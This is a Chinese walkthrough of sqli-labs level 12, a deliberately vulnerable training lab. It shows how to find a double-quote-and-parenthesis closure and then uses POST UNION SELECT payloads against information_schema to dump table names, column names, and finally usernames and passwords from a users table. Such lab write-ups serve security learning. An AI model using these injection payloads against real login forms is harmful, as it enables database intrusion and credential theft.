web——sqliabs靶场——第十二关——(基于错误的双引号 POST 型字符型变形的注入)

判断注入类型

a' OR 1 = 1#

发现没有报错 ,说明单引号不是闭合类型

测试别的注入条件

a') OR 1 = 1#

a')) OR 1 = 1#

a" OR 1=1

发现可以用双引号闭合

发现是")闭合

之后的流程还是与11关一样

爆破显示位

先抓包

是post传参,用hackbar来传参

uname=ad") order by 2 -- +&passwd=admin&submit=Submit

uname=ad") order by 3 -- +&passwd=admin&submit=Submit

爆破库名

uname=ad") union select version(),database() -- +&passwd=admin&submit=Submit

爆破表名

uname=ad") union select group_concat(table_name),3 from information_schema.tables where table_schema='security'-- +&passwd=admin&submit=Submit

爆破列名

uname=ad") union select group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'-- +&passwd=admin&submit=Submit

爆具体数据

uname=ad") union select group_concat(username,password),3 from users -- +&passwd=admin&submit=Submit

结束

相关推荐
NiNg_1_23411 分钟前
Python中Tushare(金融数据库)入门详解
数据库·python·金融
2401_857610031 小时前
实验室管理现代化:Spring Boot技术方案
数据库·spring boot·后端
微微一笑吓死谁1 小时前
linux系统中oracle数据库数据泵导入dmp数据
linux·数据库·oracle
天草二十六_简村人2 小时前
Java语言编程,通过阿里云mongo数据库监控实现数据库的连接池优化
java·jvm·数据库·mongodb·阿里云·微服务·云计算
长风清留扬2 小时前
图文解说:MySQL核心模块知识和流程
大数据·数据库·mysql·面试
highfish9202 小时前
Django实现智能问答助手-数据库方式读取问题和答案
数据库·python·django
blammmp3 小时前
MySQL:视图
数据库·mysql
常在士心3 小时前
常用的SQL语句
sql·sqlite
尘浮生3 小时前
Java项目实战II基于微信小程序的私家车位共享系统(开发文档+数据库+源码)
java·开发语言·数据库·学习·微信小程序·小程序·maven